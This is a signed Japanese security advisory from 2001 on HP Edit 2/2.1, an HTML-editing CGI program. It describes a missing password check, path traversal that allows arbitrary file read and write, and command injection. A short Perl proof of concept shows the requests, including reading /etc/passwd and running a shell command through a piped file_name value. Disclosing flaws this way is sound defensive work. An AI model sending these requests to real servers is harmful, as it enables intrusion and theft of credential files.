-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [HP Edit 2.1]                2001/02/10
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/hp-edit_2001_02_10.txt
======================================================================

■ 影響を受けるCGIプログラム

* HP Edit 2, 2.1

■ 概要

HP Edit 2.1 は 和宏氏によって作成された HTML 編集 CGI プログラムです。
このプログラムには、パスワードを入力せずに任意の機能が利用可能、かつ 
CGIプログラムの実行権限で任意のファイルを読み書き・任意のコマンドが実
行可能であるセキュリティ上の問題点があります。

HP Edit 2: http://cgiroom.pekori.to/renew/hpedit/

■ 解説

HP Edit 2 では、ログイン処理以外ではパスワードのチェックを行っていませ
ん。このため、直接各機能を呼び出すことによってパスワード入力を行わずに
任意の機能を利用できます。HP Edit 2.1 ではパスワードが入力されているか
どうかのチェックを行っているのみで、照合を行っていません。したがって、
同様に正規のパスワード入力を行わずに任意の機能を利用できます。

また、ファイルに書き出す機能を直接呼び出すことによってファイル名の制限
を回避することが可能です。これにより、CGI プログラムの実行権限で任意の
ファイルに任意の内容書き込むこと、任意のファイルを読み出すことが可能で
す。また、汚染チェックを怠っているため、これを利用して任意のコマンドを
実行可能です。

■ 影響

外部からWWWページの内容を改竄される可能性があります。また、CGIプログラ
ムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など) の場合、そ
のユーザの環境を破壊される可能性があります。

パスワードファイルなどのシステムファイルが読み出された場合、外部からの
侵入に対する手がかりを与えることになります。

任意のコマンドが実行可能なため、セキュリティレベルは非常に低くなります。

■ 回避方法

HP Edit をアンインストールする。

■ 参考コード

#! /usr/bin/perl -w

use LWP::Simple;

# create ayu.uguu (valid passwd not required)
getprint "http://host/hpedit2/hpedit.cgi?reg&pass=ayu&files=ayu.uguu&html=uguu";

# any filename may be used (valid passwd not required)
getprint "http://host/hpedit2/hpedit.cgi?reg&pass=ayu&files=../../../../../../tmp/uguu&html=uguu";

# get passwd file! (valid passwd not required)
getprint "http://host/hpedit2/hpedit.cgi?edit&pass=ayu&file_name=../../../../../../etc/passwd";

# executes a shell command "ls -lR > /tmp/ls-lR" (valid passwd not required)
getprint "http://host/hpedit2/hpedit.cgi?edit&pass=ayu&file_name=|+ls+-lR+>+/tmp/ls-lR+|";

__END__

■ 変更履歴

2001/01/26: 通知
2001/01/27: バージョンアップ (2 -> 2.1)
2001/01/27: 対処が不十分であることを通知 (返答無し)
2001/02/10: 公開
2001/02/24: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です。
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqd+duP2KhBu8ikRAm8PAKD2m/fYnC6T3YwaL/2ai/CwziLwHgCeNabP
JiBx42Yylaa4yD7jQmN06FCIPwMFATuup37CitaZXxzdBBECbw8An3XmSepQqgbJ
HJ8yeAtiwns+FhwNAJ9SzfPNlKduxxUG5lAvabiEOLwdUg==
=1Hhx
-----END PGP SIGNATURE-----